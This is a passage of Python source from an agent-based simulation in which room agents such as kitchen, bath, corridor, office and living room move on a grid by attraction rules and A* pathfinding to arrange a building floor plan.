if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_sl += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_sl += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
if self.stable_sl == 1:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class WC1RoomAgent(Attractor):
"""
An agent representing a WC room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, wc1_rooms=1, agent_width=3, agent_height=2, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.wc1_rooms = wc1_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_wc1 = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.wc1_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.wc1_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_wc1 = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is OffRoomAgent:
# self.stable_wc1 += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_wc1 += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_wc1 += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
if self.stable_wc1 == 1:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class WCRoomAgent(Attractor):
"""
An agent representing a WC room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, wc_rooms=1, agent_width=3, agent_height=2, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.wc_rooms = wc_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_wc = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.wc_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.wc_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is SL1RoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_wc = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is SL1RoomAgent:
# self.stable_wc += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is SL1RoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_wc += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_wc += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
if self.stable_wc == 1:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class LivRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, liv_rooms=1, agent_width=7, agent_height=5, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.liv_rooms = liv_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_liv = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.liv_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.liv_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.east_pole()
if random.randint(1,2) == 2:
self.west_pole()
if random.randint(1,1) == 1:
self.south_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is KitRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is EntryRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is BathRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_liv = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is EntryRoomAgent:
# self.stable_liv += 1
# if type(i) is BathRoomAgent:
# self.stable_liv += 1
# if type(i) is OffRoomAgent:
# self.stable_liv += 1
# if type(i) is CorrRoomAgent:
# self.stable_liv += 1
# if type(i) is KitRoomAgent:
# self.stable_liv += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is EntryRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_liv += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_liv += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is BathRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_liv += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_liv += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is OffRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_liv += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_liv += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is CorrRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_liv += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_liv += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is KitRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_liv += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_liv += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
if self.stable_liv == 5:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class EntryRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, entry_rooms=1, agent_width=2, agent_height=2, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.entry_rooms = entry_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_entry = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.entry_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.entry_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.east_pole()
if random.randint(1,2) == 2:
self.west_pole()
if random.randint(1,1) == 1:
self.south_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_entry = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is LivRoomAgent:
# self.stable_entry += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_entry += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_entry += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
if self.stable_entry == 1:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class KitRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, kit_rooms=1, agent_width=6, agent_height=3, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.kit_rooms = kit_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_kit = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.kit_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.kit_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.south_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.west_pole()
# Agents attraction
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is BathRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_kit = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is LivRoomAgent:
# self.stable_kit += 1
# # if type(i) is CorrRoomAgent:
# # self.stable_kit += 1
# # if type(i) is BathRoomAgent:
# # self.stable_kit += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_kit += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_kit += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
# elif type(agent) is CorrRoomAgent:
# if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
# and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
# if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
# self.stable_kit += 1
# elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
# and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
# if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
# self.stable_kit += 1
# # shortest path finder algorithm
# print(self.astar_algorithm(agent))
# for i in self.astar_path:
# self.move_agent_with_dimensions(i)
# elif type(agent) is BathRoomAgent:
# if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
# and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
# if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
# self.stable_kit += 1
# elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
# and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
# if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
# self.stable_kit += 1
# # shortest path finder algorithm
# print(self.astar_algorithm(agent))
# for i in self.astar_path:
# self.move_agent_with_dimensions(i)
if self.stable_kit == 1:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class OffRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, off_rooms=1, agent_width=4, agent_height=3, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.off_rooms = off_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_off = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.off_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.off_rooms > 0:
if random.randint(1,4) == 4:
self.west_pole()
if random.randint(1,3) == 3:
self.south_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
# Agents attraction
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is WC1RoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_off = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is LivRoomAgent:
# self.stable_off += 1
# if type(i) is WC1RoomAgent:
# self.stable_off += 1
# # if type(i) is CorrRoomAgent:
# # self.stable_off += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_off += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_off += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is WC1RoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_off += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_off += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
# elif type(agent) is CorrRoomAgent:
# if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
# and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
# if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
# self.stable_off += 1
# elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
# and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
# if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
# self.stable_off += 1
# # shortest path finder algorithm
# print(self.astar_algorithm(agent))
# for i in self.astar_path:
# self.move_agent_with_dimensions(i)
if self.stable_off == 2:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class CorrRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, corr_rooms=1, agent_width=1, agent_height=12, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.corr_rooms = corr_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_corr = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.corr_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.corr_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is SLRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is SL1RoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is KitRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_corr = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is SL1RoomAgent:
# self.stable_corr += 1
# if type(i) is SLRoomAgent:
# self.stable_corr += 1
# if type(i) is LivRoomAgent:
# self.stable_corr += 1
# # if type(i) is KitRoomAgent:
# # self.stable_corr += 1
# # if type(i) is OffRoomAgent:
# # self.stable_corr += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is SL1RoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_corr += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_corr += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is SLRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_corr += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_corr += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is LivRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_corr += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_corr += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
# elif type(agent) is KitRoomAgent:
# if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
# and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
# if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
# self.stable_corr += 1
# elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
# and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
# if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
# self.stable_corr += 1
# # shortest path finder algorithm
# print(self.astar_algorithm(agent))
# for i in self.astar_path:
# self.move_agent_with_dimensions(i)
# elif type(agent) is OffRoomAgent:
# if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
# and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
# if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
# self.stable_corr += 1
# elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
# and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
# if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
# self.stable_corr += 1
# # shortest path finder algorithm
# print(self.astar_algorithm(agent))
# for i in self.astar_path:
# self.move_agent_with_dimensions(i)
if self.stable_corr == 4:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class BathRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, bath_rooms=1, agent_width=4, agent_height=2, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.bath_rooms = bath_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_bath = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.bath_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.bath_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
# Agents attraction
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is KitRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_bath = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is LivRoomAgent:
# self.stable_bath += 1
# # if type(i) is KitRoomAgent:
# # self.stable_bath += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_bath += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_bath += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
